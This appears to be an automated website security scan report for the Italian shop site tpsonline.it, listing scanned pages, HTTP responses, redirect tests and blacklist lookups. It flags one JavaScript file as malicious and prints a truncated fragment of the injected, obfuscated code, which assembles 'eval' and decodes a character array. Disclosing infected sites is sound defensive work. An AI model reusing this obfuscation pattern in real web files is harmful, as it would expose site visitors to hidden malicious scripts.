Scanned pages/files
Request | Server response | Status |
http://tpsonline.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:21:39 GMT Location: http://www.tpsonline.it/ Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.tpsonline.it/ | 200 OK Content-Length: 58452 Content-Type: text/html | clean |
http://www.tpsonline.it/includes/swfobject.js | 200 OK Content-Length: 10723 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122
Antivirus reports:
http://codice.shinystat.com/cgi-bin/getcod.cgi?USER=tpsonline | 200 OK Content-Length: 5609 Content-Type: application/x-javascript | clean |
http://tpsonline.it/showCart.asp | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:21:42 GMT Location: http://www.tpsonline.it/showCart.asp Server: Apache Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.tpsonline.it/showcart.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 04 Oct 2014 20:21:42 GMT Location: message.asp?message=Il+tuo+carrello+%E8+vuoto%2E Server: Microsoft-IIS/6.0 Content-Length: 169 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSQCBBSRT=PPNFACBAAMDOAHDAGEHDGAFE; path=/ X-Powered-By: ASP.NET | clean |
http://www.tpsonline.it/message.asp?message=il+tuo+carrello+%e8+vuoto%2e | 200 OK Content-Length: 33974 Content-Type: text/html | clean |
http://www.tpsonline.it/showCart.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 04 Oct 2014 20:21:43 GMT Location: message.asp?message=Il+tuo+carrello+%E8+vuoto%2E Server: Microsoft-IIS/6.0 Content-Length: 169 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSQCBBSRT=BAOFACBAJDHDJPKCKBFIHLMP; path=/ X-Powered-By: ASP.NET | clean |
http://www.tpsonline.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://tpsonline.it/chi_siamo.asp | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:21:44 GMT Location: http://www.tpsonline.it/chi_siamo.asp Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.tpsonline.it/chi_siamo.asp | 200 OK Content-Length: 39604 Content-Type: text/html | clean |
http://www.tpsonline.it/condizioni.asp | 200 OK Content-Length: 55333 Content-Type: text/html | clean |
http://www.tpsonline.it/privacy.asp | 200 OK Content-Length: 43253 Content-Type: text/html | clean |
http://www.tpsonline.it/pagamenti.asp | 200 OK Content-Length: 37839 Content-Type: text/html | clean |
http://www.tpsonline.it/spedizioni.asp | 200 OK Content-Length: 36834 Content-Type: text/html | clean |
http://www.tpsonline.it/faq.asp | 200 OK Content-Length: 46154 Content-Type: text/html | clean |
http://www.tpsonline.it/customerWishListView.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 04 Oct 2014 20:21:54 GMT Location: customerAuthenticateForm.asp?redirectUrl= Server: Microsoft-IIS/6.0 Content-Length: 162 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSQCBBSRT=IAOFACBABIOKKNIDKLIBJIAE; path=/ X-Powered-By: ASP.NET | clean |
http://www.tpsonline.it/customerauthenticateform.asp?redirecturl= | 200 OK Content-Length: 34774 Content-Type: text/html | clean |
http://www.tpsonline.it/download.asp | 200 OK Content-Length: 51613 Content-Type: text/html | clean |
http://www.tpsonline.it/customerUtilitiesMenu.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 04 Oct 2014 20:21:56 GMT Location: customerAuthenticateForm.asp?redirectUrl= Server: Microsoft-IIS/6.0 Content-Length: 162 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSQCBBSRT=MAOFACBAJOEDOHLJBBFJELNH; path=/ X-Powered-By: ASP.NET | clean |
http://www.tpsonline.it/listCategoriesAndProducts.asp?idCategory=133&ido=133 | 200 OK Content-Length: 35291 Content-Type: text/html | clean |
http://www.tpsonline.it/listCategoriesAndProducts.asp?idCategory=166&ido=133 | 200 OK Content-Length: 41552 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tpsonline.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:21:39 GMT
Location: http://www.tpsonline.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tpsonline.it
Referer: http://www.google.com/search?q=tpsonline.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tpsonline.it
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tpsonline.it/
Result: tpsonline.it is not infected or malware details are not published yet.